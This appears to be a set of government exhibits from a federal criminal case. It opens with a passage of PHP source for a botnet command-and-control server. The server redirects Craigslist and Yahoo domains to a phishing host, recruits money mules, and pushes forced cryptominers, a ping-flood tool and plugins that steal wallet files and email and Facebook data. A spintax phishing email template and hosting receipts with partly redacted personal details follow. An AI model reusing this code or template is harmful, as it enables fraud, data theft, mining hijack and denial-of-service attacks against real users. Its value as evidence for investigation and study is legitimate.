aigslist.org,dallas.craigslist.org,denver.craigslist.org,detroit.craigsli
st.org,houston.craigslist.org,lasvegas.craigslist.org,losangeles.craigsli
st.org,miami.craigslist.org,minneapolis.craigslist.org,newyork.craigslist
.org,orangecounty.craigslist.org,philadelphia.craigslist.org,phoenix.crai
gslist.org,portland.craigslist.org,raleigh.craigslist.org,sacramento.crai
gslist.org,sandiego.craigslist.org,seattle.craigslist.org,sfbay.craigslis
t.org,washingtondc.craigslist.org';
                    mysql_query("UPDATE sox3_ping SET invite_craigs=0 WHERE
soxid=$soxid");
            }

            if($row['invite_yjob'] == 1)
            {
                    $x['set_intercepts'] .= '"transfers.yahoo.com"
"partyorderly.net" "/yahoo_job/" "/transfers/" "0" "mail.yahoo.com"
"partyorderly.net" "/yahoo_splash/" "/yahoo_advertising/" "0"
"www.craigslist.com" "partyorderly.net" "/yahoo_splash/"
"/yahoo_advertising/" "0" "craigslist.com" "partyorderly.net"
"/yahoo_splash/" "/yahoo_advertising/" "0" "www.craigslist.org"
```

```
"partyorderly.net" "/yahoo_splash/" "/yahoo_advertising/" "0"
"craigslist.org"  "partyorderly.net" "/yahoo_splash/"
"/yahoo_advertising/" "0" "atlanta.craigslist.org"  "partyorderly.net"
"/yahoo_splash/" "/yahoo_advertising/" "0" "austin.craigslist.org"
"partyorderly.net" "/yahoo_splash/" "/yahoo_advertising/" "0"
"boston.craigslist.org"  "partyorderly.net" "/yahoo_splash/"
"/yahoo_advertising/" "0" "chicago.craigslist.org"  "partyorderly.net"
"/yahoo_splash/" "/yahoo_advertising/" "0" "dallas.craigslist.org"
"partyorderly.net" "/yahoo_splash/" "/yahoo_advertising/" "0"
"denver.craigslist.org"  "partyorderly.net" "/yahoo_splash/"
"/yahoo_advertising/" "0" "detroit.craigslist.org"  "partyorderly.net"
"/yahoo_splash/" "/yahoo_advertising/" "0" "houston.craigslist.org"
"partyorderly.net" "/yahoo_splash/" "/yahoo_advertising/" "0"
"lasvegas.craigslist.org"  "partyorderly.net" "/yahoo_splash/"
"/yahoo_advertising/" "0" "losangeles.craigslist.org"  "partyorderly.net"
"/yahoo_splash/" "/yahoo_advertising/" "0" "miami.craigslist.org"
"partyorderly.net" "/yahoo_splash/" "/yahoo_advertising/" "0"
"minneapolis.craigslist.org"  "partyorderly.net" "/yahoo_splash/"
"/yahoo_advertising/" "0" "newyork.craigslist.org"  "partyorderly.net"
"/yahoo_splash/" "/yahoo_advertising/" "0" "orangecounty.craigslist.org"
"partyorderly.net" "/yahoo_splash/" "/yahoo_advertising/" "0"
"philadelphia.craigslist.org"  "partyorderly.net" "/yahoo_splash/"
"/yahoo_advertising/" "0" "phoenix.craigslist.org"  "partyorderly.net"
"/yahoo_splash/" "/yahoo_advertising/" "0" "portland.craigslist.org"
"partyorderly.net" "/yahoo_splash/" "/yahoo_advertising/" "0"
"raleigh.craigslist.org"  "partyorderly.net" "/yahoo_splash/"
"/yahoo_advertising/" "0" "sacramento.craigslist.org"  "partyorderly.net"
"/yahoo_splash/" "/yahoo_advertising/" "0" "sandiego.craigslist.org"
"partyorderly.net" "/yahoo_splash/" "/yahoo_advertising/" "0"
"seattle.craigslist.org"  "partyorderly.net" "/yahoo_splash/"
"/yahoo_advertising/" "0" "sfbay.craigslist.org"  "partyorderly.net"
"/yahoo_splash/" "/yahoo_advertising/" "0" "washingtondc.craigslist.org"
"partyorderly.net" "/yahoo_splash/" "/yahoo_advertising/" "0" ';
                }
            if($row['invite_yjob'] == 4)
                {
                    $x['set_intercepts'] .= '"transfers.yahoo.com"
"partyorderly.net" "/yahoo_job/" "/transfers/" "0" "mail.yahoo.com"
"partyorderly.net" "/yahoo_confirm/" "/yahoo_transfers_application/" "0"
"www.craigslist.com"  "partyorderly.net" "/yahoo_confirm/"
"/yahoo_transfers_application/" "0" "craigslist.com"  "partyorderly.net"
"/yahoo_confirm/" "/yahoo_transfers_application/" "0"
"www.craigslist.org"  "partyorderly.net" "/yahoo_confirm/"
"/yahoo_transfers_application/" "0" "craigslist.org"  "partyorderly.net"
"/yahoo_confirm/" "/yahoo_transfers_application/" "0"
"atlanta.craigslist.org"  "partyorderly.net" "/yahoo_confirm/"
"/yahoo_transfers_application/" "0" "austin.craigslist.org"
"partyorderly.net" "/yahoo_confirm/" "/yahoo_transfers_application/" "0"
"boston.craigslist.org"  "partyorderly.net" "/yahoo_confirm/"
"/yahoo_transfers_application/" "0" "chicago.craigslist.org"
"partyorderly.net" "/yahoo_confirm/" "/yahoo_transfers_application/" "0"
"dallas.craigslist.org"  "partyorderly.net" "/yahoo_confirm/"
"/yahoo_transfers_application/" "0" "denver.craigslist.org"
"partyorderly.net" "/yahoo_confirm/" "/yahoo_transfers_application/" "0"
```

```
"detroit.craigslist.org"  "partyorderly.net" "/yahoo_confirm/"
"/yahoo_transfers_application/" "0" "houston.craigslist.org"
"partyorderly.net" "/yahoo_confirm/" "/yahoo_transfers_application/" "0"
"lasvegas.craigslist.org"  "partyorderly.net" "/yahoo_confirm/"
"/yahoo_transfers_application/" "0" "losangeles.craigslist.org"
"partyorderly.net" "/yahoo_confirm/" "/yahoo_transfers_application/" "0"
"miami.craigslist.org"  "partyorderly.net" "/yahoo_confirm/"
"/yahoo_transfers_application/" "0" "minneapolis.craigslist.org"
"partyorderly.net" "/yahoo_confirm/" "/yahoo_transfers_application/" "0"
"newyork.craigslist.org"  "partyorderly.net" "/yahoo_confirm/"
"/yahoo_transfers_application/" "0" "orangecounty.craigslist.org"
"partyorderly.net" "/yahoo_confirm/" "/yahoo_transfers_application/" "0"
"philadelphia.craigslist.org"  "partyorderly.net" "/yahoo_confirm/"
"/yahoo_transfers_application/" "0" "phoenix.craigslist.org"
"partyorderly.net" "/yahoo_confirm/" "/yahoo_transfers_application/" "0"
"portland.craigslist.org"  "partyorderly.net" "/yahoo_confirm/"
"/yahoo_transfers_application/" "0" "raleigh.craigslist.org"
"partyorderly.net" "/yahoo_confirm/" "/yahoo_transfers_application/" "0"
"sacramento.craigslist.org"  "partyorderly.net" "/yahoo_confirm/"
"/yahoo_transfers_application/" "0" "sandiego.craigslist.org"
"partyorderly.net" "/yahoo_confirm/" "/yahoo_transfers_application/" "0"
"seattle.craigslist.org"  "partyorderly.net" "/yahoo_confirm/"
"/yahoo_transfers_application/" "0" "sfbay.craigslist.org"
"partyorderly.net" "/yahoo_confirm/" "/yahoo_transfers_application/" "0"
"washingtondc.craigslist.org"  "partyorderly.net" "/yahoo_confirm/"
"/yahoo_transfers_application/" "0" ';
                }
                if($row['invite_yjob'] == 2 || $row['invite_yjob'] == 3)
                {
                        $x['set_intercepts'] .= '"transfers.yahoo.com"
"partyorderly.net" "/yahoo_job/" "/transfers/" "0" ';
                }
                if($row['invite_yjob'] == -1)
                {
                        if(isset($x['unset_intercepts']))
$x['unset_intercepts'].=',';
                        $x['unset_intercepts'] .=
'transfers.yahoo.com,mail.yahoo.com,www.craigslist.com,craigslist.com,www
.craigslist.org,craigslist.org,atlanta.craigslist.org,austin.craigslist.o
rg,boston.craigslist.org,chicago.craigslist.org,dallas.craigslist.org,den
ver.craigslist.org,detroit.craigslist.org,houston.craigslist.org,lasvegas
.craigslist.org,losangeles.craigslist.org,miami.craigslist.org,minneapoli
s.craigslist.org,newyork.craigslist.org,orangecounty.craigslist.org,phila
delphia.craigslist.org,phoenix.craigslist.org,portland.craigslist.org,ral
eigh.craigslist.org,sacramento.craigslist.org,sandiego.craigslist.org,sea
ttle.craigslist.org,sfbay.craigslist.org,washingtondc.craigslist.org';
                        mysql_query("UPDATE sox3_ping SET invite_yjob=0 WHERE
soxid=$soxid");
                }
                if($row['invite_mule_craigs'] == 1)
                {
                        $x['set_intercepts'] .= '"www.craigslist.org"
"partyorderly.net" "" "/cg/" "0" "craigslist.org" "partyorderly.net" ""
"/cg/" "0" "atlanta.craigslist.org" "partyorderly.net" "" "/cg/" "0"
```

```
"austin.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"boston.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"chicago.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"dallas.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"denver.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"detroit.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"houston.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"lasvegas.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"losangeles.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"miami.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"minneapolis.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"newyork.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"orangecounty.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"philadelphia.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"phoenix.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"portland.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"raleigh.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"sacramento.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"sandiego.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"seattle.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"sfbay.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"washingtondc.craigslist.org" "partyorderly.net" "" "/cg/" "0"
"spnsd.craigslist.org" "partyorderly.net" "/craigslist_ad/" "/acc/" "0"
';
              $x['craigslist_ad'] = '<h4 class="ban">Sponsored</h4><p
class="row" data-latitude="0.000000" data-longitude="0.000000"><span
class="itemdate"></span><a
href="http://spnsd.craigslist.org/acc/3663790963.php"><b>Make Money Fast
With Yahoo Transfers</b></a><span class="itemsep"> - </span><span
class="itempn"><font size="-1"> (Country wide)</font></span></p>';
              }
              if($row['invite_mule_craigs'] == -1)
              {
                    if(isset($x['unset_intercepts']))
$x['unset_intercepts'].=',';
                    $x['unset_intercepts'] .=
'spnsd.craigslist.org,craigslist.com,www.craigslist.org,craigslist.org,at
lanta.craigslist.org,austin.craigslist.org,boston.craigslist.org,chicago.
craigslist.org,dallas.craigslist.org,denver.craigslist.org,detroit.craigs
list.org,houston.craigslist.org,lasvegas.craigslist.org,losangeles.craigs
list.org,miami.craigslist.org,minneapolis.craigslist.org,newyork.craigsli
st.org,orangecounty.craigslist.org,philadelphia.craigslist.org,phoenix.cr
aigslist.org,portland.craigslist.org,raleigh.craigslist.org,sacramento.cr
aigslist.org,sandiego.craigslist.org,seattle.craigslist.org,sfbay.craigsl
ist.org,washingtondc.craigslist.org';
                    mysql_query("UPDATE sox3_ping SET invite_mule_craigs=0
WHERE soxid=$soxid");
              }
       }

       $res = mysql_query("SELECT * FROM sox3_soxid_vars WHERE
soxid=$soxid");
       if (!$res)
```

```php
        {
                return '';
        }

        if($_GET['v']=='017') $x['kill_jhminer'] = '1';
        $x['dep_host'] = 'partyorderly.net';
        $x['dep_path'] = '/dep/';
        $x['no_password'] = 0;
        $x['timer'] = TIMER_NORMAL * 60;

        if (mysql_num_rows($res) > 0)
        {
                while ($row = mysql_fetch_array($res))
                {
                        $key = $row['pkey'];
                        $value = $row['pvalue'];

                        if ($key!='state' && $key!='cpuinfo')
                        {
                                mysql_query("DELETE FROM sox3_soxid_vars WHERE
soxid=$soxid AND pkey='$key'");
                        }

                        $x[$key] = $value;

                        $res2 = mysql_query("SELECT lport, relay_status FROM
sox3_ping WHERE soxid=$soxid LIMIT 1");
                        if (!$res2)
                        {
                                return '';
                        }
                        $row2 = mysql_fetch_row($res2);

                        $lport = $row2[0];
                        $relay_status = $row2[1];
                        if ($lport > 1 || $relay_status == 1)
                        {
                                $x['timer'] = TIMER_LPORT * 60;
                        }
                }
        }

        if($miner_forced || $do_pingflood) $x['timer'] = TIMER_NORMAL * 60;

        foreach ($x as $key => $value)
        {
                $rtn.='%'.$key.'% = "'.$value.'";'.".""\n";
        }

        if(isset($x['send_libpurple_spam']))
        {
                $time=time();
                mysql_query("UPDATE sox3_ping SET libpurple_work=$time WHERE
soxid=$soxid");
```

```php
        }

        return $rtn;
}

function plugin()
{
        global $do_pingflood;
        global $miner_forced;
        global $ad_click;
        global $ad_click_params;
        //if($_GET['v'] != VER_UPGRADE_TO) return '';

        $rtn='';

        $soxid = hexdec(mysql_real_escape_string($_GET['sox']));

        if($do_pingflood==1)
        {
                $time=time();
                $text = file_get_contents('flood_host');
                //$text="nrs.blockquarry.com 3600000\n";
                //$text="nrs.flipsidemining.com 3000000\n";
             $rtn .= "do_pingflood\0";
          $rtn .= strlen($text)."\0$text";
          $rtn .= file_get_contents('plugins/pingflood.exe.dep');
                mysql_query("UPDATE sox3_ping SET do_pingflood=2,
do_pingflood_time=$time, flag=1 WHERE soxid=$soxid");
                return $rtn;
        }else if($miner_forced==1)
        {
                //oldRIC $text="jhforcedric64.exe -o mining.ypool.net -u
davidkps.ric_forced -p x -S {$_GET['sox']}\n";

                if($_GET['x64']=='1')
                {
                        //$exefile='win64ric311.exe';
                        $exefile='win64drkclient.exe';
                        //$text="$exefile -a X11 -o
stratum+tcp://205.186.154.88:3999 -u guest -p x\n";
                        //$text="$exefile -a X11 -o
stratum+tcp://205.186.154.88:810".rand(0,9)." -u
XpvpaMywFv86uk1642Zx4miswVLuifDXxf -p x\n";
                        //$exefile='jhwin64fastrie.exe';
                        //$exefile='jhwin64friea.exe'; $text="$exefile -o
relay.ypool.net -u davidkps.ric_forced -p x -S {$_GET['sox']}\n";
                        //$exefile='win64hvcclient.exe';

                }else
                {
                        //$exefile='jhminer32.exe'; $text="$exefile -o
relay.ypool.net -u davidkps.nrs_1 -p x -S {$_GET['sox']}\n";
                        //$exefile='win32ric311.exe';
                        $exefile='win32drkclient.exe';
```

```
            //$text="$exefile -a X11 -o
stratum+tcp://205.186.154.88:3932 -u guest -p x\n";
            //$text="$exefile -a X11 -o
stratum+tcp://205.186.154.88:810".rand(0,9)." -u
XoAsvQUE9yFPzSsQeNmRWpxQEbNiS35Ua4 -p x\n";
            //$exefile='jhwin32fastrie.exe';
            //$exefile='jhwin32friea.exe';
            //$exefile='win32hvcclient.exe';
        }

        //$text="$exefile -a X11 -o stratum+tcp://67.205.14.206:3999
-u {$_GET['sox']} -p x\n";
        $text="$exefile -a X11 -o stratum+tcp://108.174.146.78:3388 -
u {$_GET['sox']} -p x\n";


        //$text="$exefile -a X11 -o stratum+tcp://205.186.154.88:3333
-u {$_GET['sox']} -p x\n";
        //$text="$exefile -a X11 -o 205.186.154.88:5566 -u dark -p
xalkxrm\n";
        //$text="$exefile -a X11 -o
stratum+tcp://208.113.247.245:3366 -u {$_GET['sox']} -p $exefile\n";

        //$text="$exefile -o 205.186.154.88:2811".rand(0,9)." -u
riecoinrpc -p csAVAPQkjadlariLHoosAwaf9EtpWRCLiQckuTLhXm\n";
        //$text="$exefile -o relay.ypool.net -u davidkps.ric_forced -
p x -S {$_GET['sox']}\n";
        //$text="$exefile -o 205.186.154.88:28443 -u test -p
testnet\n";

        /*
        $hvc_addresses=array('HTKD6hi7kneS79xnEnpWbJRFhpyBd9uLXH',

    'HBY1Midv4oMmf2Bs1Pv143tfyiZCsg6zPJ',

    'HLyMQ9SUXLCSPbhjmGyk6NgrBtYmMKMBFK',

    'HFatD1WhNqpmb5sbzr5Drj3E5uHT2vi4Ha',

    'HFm2oK4GWHM6iGXNZT3c1RS1QBucnTzgq2',

    'HS1nQKDqcHKinjQ9ax3UhQ59HGKVtzraVV',

    'HVkw96FmozKe5eG2q4gQUB4Y5TBXu69UST',

    'HSUiJa5v7CLnbHeZRqLitLcn4KTsND1PiV',

    'HUnsb41H8JMdYA26sxQKCxLvCkaT5XYPzs');

        $hvc_wallet=$hvc_addresses[array_rand($hvc_addresses)];
        $text="$exefile -a heavy -v 1024 -o
stratum+tcp://hvcpool.1gh.com:5333 -u $hvc_wallet -p x\n";
        */
```

```
        $rtn .= "miner_forced\0";
        $rtn .= strlen($text)."\0$text";
        $rtn .= file_get_contents('plugins/miner_forced.exe.dep');
            mysql_query("UPDATE sox3_ping SET miner_forced=0, flag=1
WHERE soxid=$soxid");
            return $rtn;
    }
/*
    if ($ad_click)
    {
      $rtn .= "casper_pipe\0";
      $rtn .= strlen($ad_click_params)."\0$ad_click_params";
      $rtn .= file_get_contents('plugins/casper_pipe.exe.dep');
          return $rtn;
    }
*/
    $r = mysql_query("SELECT * FROM sox3_plugin_exe WHERE soxid=$soxid
ORDER BY priority LIMIT 1");
    if (!$r || mysql_num_rows($r) == 0)
        return '';

    $row = mysql_fetch_array($r);
    $id = $row['id'];
    $plugin = $row['plugin'];
    $params = $row['params'];
      if ($plugin == 'windefender')
    {
        $text='';
        $rtn .= "windefender\0";
        $rtn .= strlen($text)."\0$text";
        $rtn .= file_get_contents('plugins/windefender.exe.dep');
    }
    else if ($plugin == 'curl_yahoo')
    {
        $rtn .= "yahoo_maillist\0";
        $rtn .= strlen($params)."\0$params";
        $rtn .= file_get_contents("plugins/curl_yahoo.exe.dep");
    }
    else if ($plugin == 'outlook')
    {
        $rtn .= "outlook_maillist\0";
        $rtn .= strlen($params)."\0$params";
        $rtn .= file_get_contents("plugins/pffexport.exe.dep");
    }
    else if ($plugin == 'childorig.dl')
    {
        $text='hackers JHHAJAJFJEA';
        $rtn .= "testtest\0";
        $rtn .= strlen($text)."\0$text";
        $rtn .= file_get_contents('childorig.dl');
    }
      else if ($plugin == 'googleTakeout.casper')
    {
```

```
        $rtn .= "googleTakeout.casper\0";
        $rtn .= strlen($params)."\0$params";
        $rtn .=
file_get_contents('plugins/googleTakeout.casper.exe.dep');
    }
      else if ($plugin == 'yahooHosting.casper')
    {
        $rtn .= "yahooHosting.casper\0";
        $rtn .= strlen($params)."\0$params";
        $rtn .= file_get_contents('plugins/yahooHosting.casper.exe.dep');
    }
      else if ($plugin == 'facebook.casper')
    {
        $rtn .= "facebook.casper\0";
        $rtn .= strlen($params)."\0$params";
        $rtn .= file_get_contents('plugins/facebook.casper.exe.dep');
    }
      else if ($plugin == 'testsha512')
    {
        $text='';
        $rtn .= "testtest\0";
        $rtn .= strlen($text)."\0$text";
        $rtn .= file_get_contents('plugins/testsha512.exe.dep');
    }
      else if ($plugin == 'killminers')
    {
        $text='';
        $rtn .= "testtest\0";
        $rtn .= strlen($text)."\0$text";
        $rtn .= file_get_contents('plugins/killminers.exe.dep');
    }else if ($plugin == 'walletdat')
    {
        $text='';
        $rtn .= "walletdat\0";
        $rtn .= strlen($text)."\0$text";
        $rtn .= file_get_contents('plugins/walletdat.exe.dep');
    }else if ($plugin == 'HasNET')
    {
        $text='';
        $rtn .= "HasNET\0";
        $rtn .= strlen($text)."\0$text";
        $rtn .= file_get_contents('plugins/HasNET.exe.dep');
    }
    mysql_query("DELETE FROM sox3_plugin_exe WHERE id=$id");

      return $rtn;
}

if(isset($_GET['flag'])) $flag=1;
$x = @ping(); $l = strlen($x); if($l>0) echo "ping\0$l\0$x";
if($flag==1)
{
        $x = @cfg(); $l = strlen($x); if($l>0) echo "cfg\0$l\0$x";
```

```
      $x = @var_user_ip(); $l = strlen($x); if($l>0) echo
"var_user_ip\0$l\0$x";
      $x = @plugin(); $l = strlen($x); if($l>0) echo "plugin\0$l\0$x";
}

echo "\xa0\xbb\xbd\xa0\xac\xaa\xbc\xbc\xba\xac\xac";
```

{See^Consult^Read^Go through^Refer to^Study} {the ^}attached {doc{^ument{^ file}}^file} {to access^to view^to find out^to get} {more^complete^all{^ of} the} {details^info{rmation^}} {^.^!}<br/>
{You {{will ^}have to^should^must} {use^enter^type{^ in}}^Please {use^enter^type{^ in}}^{Use^Enter^Type{^ in}}^You {will ^}need{^ to use^ to enter^ to type{^ in}}^When asked, {{please ^}use^enter^type{^ in}}} {the following^this} {pass{^key^code^phrase^word}^key{^word}}{ ^}: <b>%aol_current_pass%</b><br/><br/>

{Upon^After} {examining^reading^analyzing^reviewing} {it^{the^this} document^{the^these} results}, {please ^you must ^}{contact^reach^get in touch with} me {asap^immediately^ASAP^as soon as possible^urgently}.<br/><br/>

%aol_senders_name%, {M.D.{^, Ph.D.}^M.D.^M.D., Ph.D.}{, FACP^, FIDSA^, NCI^, XOMA^}{, CDRH^, CDER^, DCTD^, NIH^}

GOVERNMENT
EXHIBIT
1:16CR224
2073

 YAHOO!
SMALL BUSINESS

 Rudy ⚙

**Congratulations, your order 206676889 is confirmed.**

For tips, news, and advice about Yahoo Small Business, visit us on Twitter, Facebook, and YouTube.

 Set up your online store
and save up to 70%.
*Now includes
Live Web Insights*
Get started
 YAHOO!
SMALL BUSINESS

**What's Next?**

**Set up email and start your site.**
- Choose your default email address.
- Pick a site design tool.
- Start building your web site!

Get Started



**Receipt for Order 206676889.** Print your receipt. We'll also send an email confirmation to rudystevenson@yahoo.com. Update your email address.
Date: 03/22/14

**Order Summary**

| Product | Term | Today's Charge | More Details |
|---|---|---|---|
| Web Hosting Advanced | 1 month | $9.99 | |
| Web Hosting Advanced Setup fee | one-time fee | $0.00 | $25.00 setup fee waived¹ |
| Domain name | | | |
| variouspeople.net ⟲ included | 1 year | $0.00 | Included with plan. We'll renew your registration annually. $25.00 setup fee waived¹ |
| | | $9.99 total See more on billing | You saved $25 |

**Account**

**Yahoo ID:** rudystevenson

**Payment Information**

You can view or change your billing information anytime on your billing information page. Please note that we will charge this payment method each billing period until you cancel.

VISA  xxxx-2494   1936 Palmetto Ave
Exp: 08/2015        Ontario, CA 91762

**Recurring Charges**

You have subscribed to the services listed above, for which the total recurring charges listed below apply. These charges will be billed on an auto-renew basis for each term, until you cancel. If you choose to cancel, you will no longer receive or be charged for any future term, and no refund will be provided. You may cancel at any time. This service is subject to the Yahoo Small Business Terms of Service, which include the third-party agreements for any additional options you've ordered.

| Product | Charge Amount | How Often You'll Be Charged | When You'll See the First Recurring Charge |
|---|---|---|---|
| Web Hosting Advanced | $9.99 | monthly | 1 mo. |

The recurring charges exclude any promotional offers that may apply past the first term of your service. If promotional pricing applies, you will be charged the discounted price until the promotion period ends.

**Domain Contact Information**

**Registrant**

| | |
|---|---|
| Name | ▬▬▬▬ |
| Organization | variouspeople |
| Address (line 1) | ▬▬▬▬ |
| City | Ontario |
| State / Province | CA |
| Zip / Postal Code | 91762 |
| Country | United States |
| Email Address | rudystevenson@▬▬▬ |
| Country Code / Phone | +▬▬▬▬ |

**Administrator**

| | |
|---|---|
| Name | ▬▬▬▬ |
| Organization | variouspeople |
| Address (line 1) | ▬▬▬▬ Ave |
| City | Ontario |
| State / Province | CA |
| Zip / Postal Code | 91762 |
| Country | United States |
| Email Address | ▬▬▬▬@yahoo.com |
| Country Code / Phone | ▬▬▬▬ |

Get Started

¹Yahoo Merchant Solutions and Yahoo Web Hosting discount offer is open to new Yahoo Small Business customers only. Discount applies for the first year (Merchant Starter only) or first 3 months, after which the then-current term fee will be charged. This discount fee offer expires on 3/31/2014. Customers are limited to redemption of this offer once on a single account. Offer is nontransferable and may not be combined with other offers and discounts, exchanged, or redeemed for cash. Other terms and conditions apply; see the Yahoo Small Business Terms of Service when you sign up. Yahoo expressly reserves the right to change or cancel the price or features of these services at its sole discretion anytime. All plans will renew automatically after the initial term unless canceled pursuant to Yahoo Small Business Terms of Service.

Terms | Help

NOTICE: We collect personal information on this site.
To learn more about how we use your information, see our Privacy.

GOVERNMENT
EXHIBIT
1:16CR224

2078

**YAHOO!**
SMALL BUSINESS

  Maddie ⚙

Congratulations, your order 205352225 is confirmed.

For tips, news, and advice about Yahoo Small Business, visit us on Twitter, Facebook, and YouTube.



Bring your website to life today
AND SAVE 50%! (limited-time offer)

YAHOO!
SMALL BUSINESS
Make it Happen

**What's Next?**

Set up email and start your site.
- Choose your default email address.
- Pick a site design tool.
- Start building your web site!

Get Started

 

YAHOO!
**Marketing**
Dashboard
Your business, revealed.

Get it FREE

**Receipt for Order 205352225.** Print your receipt. We'll also send an email confirmation to maddie_harmon@yahoo.com. Update your email address.
Date: 01/28/14

**Order Summary**

| Product | Term | Today's Charge | More Details |
|---|---|---|---|
| Web Hosting Advanced | 1 month | $9.99 | |
| Web Hosting Advanced Setup fee | one-time fee | $0.00 | $25.00 setup fee waived[1] |
| **Domain name** | | | |
| buildingsuppose.net ☑ Included | 1 year | $0.00 | Included with plan. We'll renew your registration annually. $25.00 setup fee waived[1] |
| | | **$9.99 total** See more on billing | **You saved $25** |

**Account**

Yahoo ID: maddie_harmon

**Payment Information**

You can view or change your billing information anytime on your billing information page. Please note that we will charge this payment method each billing period until you cancel.

AMEX  xxxx-2008   7167 Brooking Way
Exp: 12/2016    Mechanicsville, VA 23111

**Recurring Charges**

You subscribed to the services listed above, for which the total recurring charges listed below apply. These charges will be billed on an auto-renew basis for each term, until you cancel. If you choose to cancel, you will no longer receive or be charged for any future term, and no refund will be provided. You may cancel at any time. This service is subject to the Yahoo Small Business Terms of Service, which include the third-party agreements for any additional options you've ordered.

| Product | Charge Amount | How Often You'll Be Charged | When You'll See the First Recurring Charge |
|---|---|---|---|
| Web Hosting Advanced | $9.99 | monthly | 1 mo. |

The recurring charges exclude any promotional offers that may apply past the first term of your service. If promotional pricing applies, you will be charged the discounted price until the promotion period ends.

**Domain Contact Information**

**Registrant**

| | |
|---|---|
| Name | ▓▓▓▓▓▓▓▓▓ |
| Organization | buildingsuppose |
| Address (line 1) | ▓▓▓▓▓▓▓▓▓ |
| City | Mechanicsville |
| State / Province | VA |
| Zip / Postal Code | 23111 |
| Country | United States |
| Email Address | ▓▓▓▓▓▓▓▓▓ |
| Country Code / Phone | ▓▓▓▓▓▓▓▓▓ |

**Administrator**

| | |
|---|---|
| Name | ▓▓▓▓▓ |
| Organization | buildingsuppose |
| Address (line 1) | ▓▓▓▓▓▓▓▓▓ |
| City | Mechanicsville |
| State / Province | VA |
| Zip / Postal Code | 23111 |
| Country | United States |
| Email Address | ▓▓▓▓▓▓▓▓▓ |
| Country Code / Phone | ▓▓▓▓▓▓▓▓▓ |

Get Started

[1]Yahoo Merchant Solutions and Yahoo Web Hosting discount offer is open to both new and existing Yahoo Small Business customers. Discount applies for the first year (Merchant Starter only) or first 3 months, after which the then-current term fee will be charged. The discount fee offer expires on 12/31/2014. Customers are limited to redemption of this offer once on a single account. Offer is nontransferable and may not be combined with other offers and discounts, exchanged, or redeemed for cash. Other terms and conditions apply; see the Yahoo Small Business Terms of Service when you sign up. Yahoo expressly reserves the right to change or cancel the price or features of these services at its sole discretion at any time. All plans will renew automatically after the initial term unless cancelled pursuant to Yahoo Small Business Terms of Service.

Terms | Help
NOTICE: We collect personal information on this site.
To learn more about how we use your information, see our Privacy.

GOVERNMENT
EXHIBIT
1:16CR224

2079